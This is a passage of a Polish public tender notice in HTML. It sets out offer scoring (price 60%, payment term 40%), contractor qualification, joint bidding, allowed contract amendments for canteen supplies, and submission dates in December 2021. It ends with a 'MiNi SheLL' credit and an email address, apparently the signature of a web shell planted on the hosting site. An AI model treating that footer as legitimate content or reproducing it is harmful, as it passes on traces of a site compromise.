ofercie w ramach kryterium Cena<br/>Tp- liczba punktów przyznana ofercie w ramach kryterium Termin płatności<br/><br/>Ocenie punktowej będą podlegać wyłącznie oferty uznane za ważne i nie podlegające<br/>odrzuceniu.<br/>2. W sytuacji, gdy Zamawiający nie będzie mógł wybrać najkorzystniejszej oferty, z uwagi na<br/>to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert,<br/>Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.<br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie<br/>wszystkim wymaganiom przedstawionym w ustawie Pzp oraz SWZ i zostanie oceniona, jako<br/>najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>5. W przypadku złożenia oferty tylko przez jednego wykonawcę, zamawiający dokona wyboru<br/>tej oferty jeżeli zostaną spełnione wszystkie kryteria określone w SWZ.<br/>6. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego<br/>Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym<br/>wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza<br/>do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić<br/>zgodnie z obowiązującymi przepisami.<br/>7. Zamawiający zgodnie z art. 223 ust. 2 Pzp poprawi w ofercie: omyłki pisarskie, oczywiste<br/>omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>inne omyłki polegające na niezgodności oferty dokumentami zamówienia, niepowodujące<br/>istotnych zmian w treści oferty – niezwłocznie zawiadamiając o tym Wykonawcę, którego<br/>oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale XII SWZ, składa każdy z Wykonawców.<br/>Oświadczenie te potwierdzają brak podstaw wykluczenia.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają zmiany istotnych postanowień niniejszej umowy, zgodnie z art. 455 ustawy Prawo zamówień publicznych, w przypadku wystąpienia następujących okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy, polegające na:<br/>a) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację przedmiotu zamówienia w tym zmiany ustawowe zmiany stawki podatku od towarów i usług (VAT),<br/>b) zmiany terminu, częstotliwości dostaw i sposobu wykonywania umowy w przypadku, gdy niezbędna jest zamiana sposobu wykonywania lub terminu, częstotliwości realizacji przedmiotu umowy, o ile zmiana taka jest korzystna dla zamawiającego oraz konieczna w celu prawidłowego wykonania umowy.<br/>c)w zakresie rzeczowym przedmiotu umowy tj. zaprzestania wytwarzania produktu objętego umową, pod warunkiem , iż odpowiednik jest tej samej lub wyższej jakości , za cenę nie wyższą niż cena produktu objętego umową.<br/>d)przedłożenia przez Wykonawcę oferty korzystniejszej dla Zamawiającego, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości za cenę nie wyższa niż cena produktu objętego umową.<br/>e)wprowadzenia do sprzedaży przez producenta zmodyfikowanego/ udoskonalonego produktu powodującego wycofanie dotychczasowego za cenę nie wyższą niż cena produktu objętego umową<br/>f)dopuszcza się zmiany umowy w zakresie numeru katalogowego, nazwy produktu wielkości opakowania przy zachowaniu jego parametrów - w przypadku wprowadzenia niniejszych zmian przez producenta potwierdzonych odpowiednimi dokumentami.<br/>g) zwiększenia wartości umowy brutto o ile stało się to niezbędne dla zapewnienia ciągłości dostawy oraz prawidłowego funkcjonowania stołówki na skutek okoliczności jakich nie można było przewidzieć na etapie prowadzenia postępowania o zamówienie.<br/>2. Dopuszcza się zmiany w treści niniejszej umowy gdy zmiany te są nieistotne w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>3. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com